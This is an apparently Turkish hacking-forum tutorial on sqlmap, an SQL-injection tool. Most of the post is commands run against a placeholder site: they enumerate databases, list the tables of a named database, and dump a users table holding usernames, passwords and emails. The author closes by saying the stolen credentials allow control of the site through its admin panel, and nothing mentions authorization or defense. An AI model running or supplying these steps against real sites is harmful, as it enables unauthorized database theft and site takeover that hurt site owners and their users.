anonymous
Kayıtlı Üye
- Katılım
- 26 Aralık 2020
- Mesajlar
- 67
- Tepkime puanı
- 104
- İlgi Alanlarınız
- pentest
- Cinsiyet
-
- Erkek
Sqlmap nedir?
Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar. Sqlmap nedir?
![sqlmap_bg2.jpg sqlmap_bg2.jpg](https://hacktivizm.org/data/attachments/0/75-24c2a165a7b8af9fe2b00167c60116b9.jpg)
Sqlmap ile ne yapabilirim?
-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmekSqlmap ile ne yapabilirim?
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.
Sqlmap nasıl kullanılır?
Sqlmap nasıl kullanılır?
Sqlmap ile siteleri kontrol etmek için
Kod:
sqlmap -u URL
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8
Sqlmap ile Database Listelenmesi ve Dump Edilmesi
Database listeleyebilmek için -dbs parametresi kullanılır.Sqlmap ile Database Listelenmesi ve Dump Edilmesi
Örnek
Kod:
sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs
Database İçerisinden Bilgileri Almak
Örneğin orneksite.org sitesi için iki veritabanı bulundu![31d44879335c90ee72aec3b37cad48af.08-1.jpg 31d44879335c90ee72aec3b37cad48af.08-1.jpg](https://hacktivizm.org/data/attachments/0/76-bc7dc4b65422893f73102e30f34d99e0.jpg)
Main_wellerpools veritabanındaki tabloların listesini almak istiyorum
Kod:
sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables
Tabloların listesi
![51bf6bd326c70cbf83c409134c81b20d.10-1.jpg 51bf6bd326c70cbf83c409134c81b20d.10-1.jpg](https://hacktivizm.org/data/attachments/0/77-feb2fa9c9aeb743b5290c25c5cf08583.jpg)
Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns
![3157cddd313764901d9ba218ec6f2cc0.11-1.jpg 3157cddd313764901d9ba218ec6f2cc0.11-1.jpg](https://hacktivizm.org/data/attachments/0/78-ee2a5ddde4bd394c3e343c151c557bfe.jpg)
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz
Kod:
sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump
![d74fc3a589cbef45a02c0ef6a234bce0.12-1.jpg d74fc3a589cbef45a02c0ef6a234bce0.12-1.jpg](https://hacktivizm.org/data/attachments/0/79-30f0f5a99e10be4733858f60bc4b8171.jpg)
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz
Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar